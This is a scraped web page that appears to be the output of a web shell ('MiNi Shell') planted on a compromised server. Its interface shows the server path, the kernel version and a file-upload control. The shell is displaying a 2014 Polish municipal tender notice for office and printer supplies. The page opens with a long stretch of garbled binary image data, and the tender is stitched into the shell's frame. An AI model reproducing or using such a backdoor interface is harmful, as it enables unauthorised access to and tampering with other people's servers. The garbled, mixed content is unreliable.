JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140121/23850-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Sukcesywna dostawa artykułów biurowych, materiałów papierniczych do sprzętu drukarskiego i kserokopiarek oraz sukcesywna dostawa materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej
Zadanie A  Sukcesywna dostawa artykułów biurowych i materiałów papierniczych do sprzętu drukarskiego i kserokopiarek dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej
Zadanie B  Sukcesywna dostawa materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla MZBM w Dąbrowie Górniczej.</b><br>
<b>Numer ogłoszenia: 23850 - 2014; data zamieszczenia: 21.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Tysiąclecia 20, 41-303 Dąbrowa Górnicza, woj. śląskie, tel. 032 2608652, 2608619, faks 032 2642767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzbm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowy Zakład Budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów biurowych, materiałów papierniczych do sprzętu drukarskiego i kserokopiarek oraz sukcesywna dostawa materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej
Zadanie A  Sukcesywna dostawa artykułów biurowych i materiałów papierniczych do sprzętu drukarskiego i kserokopiarek dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej
Zadanie B  Sukcesywna dostawa materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla MZBM w Dąbrowie Górniczej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy  artykułów biurowych, materiałów papierniczych do sprzętu drukarskiego i kserokopiarek  oraz sukcesywne dostawy materiałów  eksploatacyjnych do sprzętu drukarskiego i telefaksów dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej, z podziałem na 2 części, zwane dalej Zadaniami, tj.
Zadanie A Sukcesywna dostawa artykułów biurowych i materiałów papierniczych do sprzętu drukarskiego i kserokopiarek dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej
Zadanie B  Sukcesywna dostawa materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej.
Dodatkowe informacje oraz wymagania dotyczące przedmiotu zamówienia dla  zadania A.
Wykonawca będzie zobowiązany do sukcesywnego dostarczania artykułów biurowych i materiałów papierniczych  do sprzętu drukarskiego i kserokopiarek oraz materiałów eksploatacyjnych do sprzętu drukarskiego i telefaksów dla Miejskiego Zarządu Budynków Mieszkalnych w Dąbrowie Górniczej  w ilościach wyszczególnionych w załączniku nr 2 A do SIWZ  dla Zadania A  oraz załączniku nr 2B do siwz dla Zadania B. 
Dostawa towaru odbywać się będzie sukcesywnie, w zależności od bieżących potrzeb Zamawiającego, który będzie określał każdorazowo rzeczowo ilościowy zakres dostaw poszczególnych partii asortymentu. 
Każda z dostaw zostanie zrealizowana w całości , w ciągu 2 dni  od dnia złożenia zamówienia faxem w dniach i godzinach pracy MZBM tj. od poniedziałku do czwartku od godziny 7.30 do 15.30, w piątek od godziny 7.30 do 13.00, po wcześniejszym telefonicznym poinformowaniu odpowiedzialnego pracownika Działu Polityki Personalnej i Organizacji.
Fakturowanie dostaw odbywać się będzie sukcesywnie w zależności od dostaw, a faktury powinny być przekładane Zamawiającemu w dniu dostarczenia danego zamówienia
Ceny zadeklarowane w formularzach oferty cenowej pozostaną niezmienne do końca trwania umowy 
Zamawiajacy zastrzega sobie prawo do zmniejszenia zakresu zamówienia objętego przedmiotem umowy, co nie będzie stanowiło podstawy do odstąpienia od umowy przez Wykonawcę z winy Zamawiającego, jak również do żądania odszkodowania.
Termin rozpatrzenia reklamacji wraz z wymianą produktu wadliwego na wolny od wad najpóźniej do 14 dni od daty jej zgłoszenia. Wykonawca odbierze na własny koszt towary będące przedmiotem reklamacji w celu wymiany na wolne od wad w ciągu 2 dni od daty otrzymania reklamacji za pośrednictwem faksu.
Dostarczenie zamówienia własnym transportem Wykonawcy wraz z wniesieniem do wskazanych przez Zamawiającego pomieszczeń w budynku Dyrekcji MZBM w Dąbrowie Górniczej, ul.Tysiąclecia 20  bez dodatkowych 
opłat
Wykonawca ubezpieczy transport przedmiotu umowy na koszt własny.
Odpowiedzialnym za zlecenie dostaw jest Dział Polityki Personalnej i Organizacji MZBM.
Termin realizacji zamówienia od daty zawarcia umowy  do 31.12.2014r lub wykorzystania środków finansowych
Termin płatności faktur - przelew w terminie do 30 dni od daty złożenia faktury w siedzibie Zamawiającego.
Minimalny okres gwarancji 12 miesięcy.
Szczegółowy opis przedmiotu zamówienia asortyment, ilość określa załącznik nr 2A do SIWZ pn. Formularz oferty cenowej  dla Zadania A
Wyceny przedmiotu zamówienia należy dokonać,  dla Zadania A wg załącznika nr 2A do SIWZ.
Dodatkowe informacje oraz wymagania dotyczące przedmiotu zamówienia dla  zadania B
Dostawa towaru odbywać się będzie sukcesywnie, w zależności od bieżących potrzeb Zamawiającego, który będzie określał każdorazowo zakres rzeczowoilościowy zakres dostaw poszczególnych partii asortymentu. Każda z dostaw zostanie zrealizowana w całości, w ciągu 2 dni od dnia złożenia zamówienia faxem w dniach i godzinach pracy MZBM, tj.od poniedziałku do czwartku od godziny 7.30 do 15.30, w piątek od godziny 7.30 do 13.00, po wcześniejszym telefonicznym poinformowaniu odpowiedzialnego pracownika Działu Polityki Personalnej i Organizacji,
Fakturowanie dostaw odbywać się będzie sukcesywnie w zależności od dostaw , a faktury powinny być przekładane Zamawiającemu w dniu dostarczenia danego zamówienia,
Ceny zadeklarowane w formularzu oferty cenowej pozostaną niezmienne do końca trwania umowy,
Zamawiający zastrzega sobie prawo do zmniejszenia zakresu zamówienia objętego przedmiotem umowy, co nie będzie stanowiło podstawy do odstąpienia od umowy przez Wykonawcę z winy Zamawiającego, jak również do żądania odszkodowania,
Termin rozpatrzenia reklamacji wraz z wymianą produktu wadliwego na wolny od wad najpóźniej do 14 dni od  daty jej zgłoszenia. Wykonawca odbierze na własny koszt towary będące przedmiotem reklamacji w celu  	wymiany na wolne od wad w ciągu 2 dni od daty otrzymania reklamacji za pośrednictwem faksu.
Dostarczenie zamówienia własnym transportem Wykonawcy wraz z wniesieniem do wskazanych przez Zamawiającego pomieszczeń w budynku Dyrekcji MZBM w Dąbrowie Górniczej, ul. Tysiąclecia 20 bez dodatkowych opłat;
Wykonawca ubezpieczy transport przedmiotu umowy na koszt własny;
Odpowiedzialnym za zlecanie dostaw jest Dział Polityki Personalnej i Organizacji MZBM.
Na wniosek Zamawiającego Wykonawca zobowiązany jest do sukcesywnego odbioru odpadów opakowań po zużytych materiałach eksploatacyjnych w terminie uzgodnionym z Zamawiającym. Wykonawca na własny  koszt będzie odbierał odpady opakowania po zużytych materiałach eksploatacyjnych wyszczególnionych w 	kalkulacji ofertowej w zamian dostarczając Zamawiającemu pokwitowanie odbioru odpadu. Po przekazaniu przez Zamawiającego odpadów, stają się one własnością Wykonawcy.
Termin realizacji zamówienia:  od daty zawarcia umowy  do 31.12.2014r. lub do  wykorzystania środków finansowych.
Termin płatności faktur:  przelew w terminie  do 30 dni od daty złożenia faktury w siedzibie Zamawiającego.
Wymagania techniczne  w przypadku zamienników zgodność parametrów z oryginalnymi produktami producenta, kompatybilność ze wskazanymi urządzeniami
Minimalny okres gwarancji : 12 miesięcy. 
 Wykonawca gwarantuje prawidłową pracę produktu, wymianę wadliwego produktu na nowy, zwrot kosztów  i naprawy sprzętu drukarskiego, jeśli przyczyną awarii jest zastosowanie dostarczonego przez Wykonawcę   produktu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.19.21.13-6, 30.12.43.00-7, 30.19.29.10-3, 30.19.23.20-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art.22 ust.1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły:  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art.22 ust.1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły:  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający żąda złożenia oświadczenia z art.22 ust.1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły:  spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy załącznik 1 do SIWZ  wskazana data podpisania
Wypełniony i podpisany Formularz oferty cenowej, sporządzony na podstawie wzorów stanowiących załącznik 2A do SIWZ  dla Zadania A, załącznik nr 2B do SIWZ  dla Zadania B.Dokumenty i oświadczenia o których mowa w  rozdziale 8 siwz  
Pełnomocnictwa, upoważnienia o których mowa w rozdziale 15 siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w skutek:
a) istotnych braków lub błędów w kalkulacji ofertowej;
b) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę , jeżeli te zmiany są korzystne dla Zamawiającego; 
c) z powodu wystąpienia dodatkowych , a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę , dostaw;
d)z powodu siły wyższej , np. wystąpienia zdarzenia losowego wywołanego przez czynniki
zewnętrzne, którego nie można było przewidzieć  z pewnością , w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach ;
e) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek  ze stron;
f) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
g) zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska,
h) zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia- Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia.
i)zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT,
Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony aneks podpisany przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych, 41-303Dąbrowa Górnicza ul.Tysiąclecia 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2014 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych, 41-303Dąbrowa Górnicza ul.Tysiąclecia 20, pokój nr 2 kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com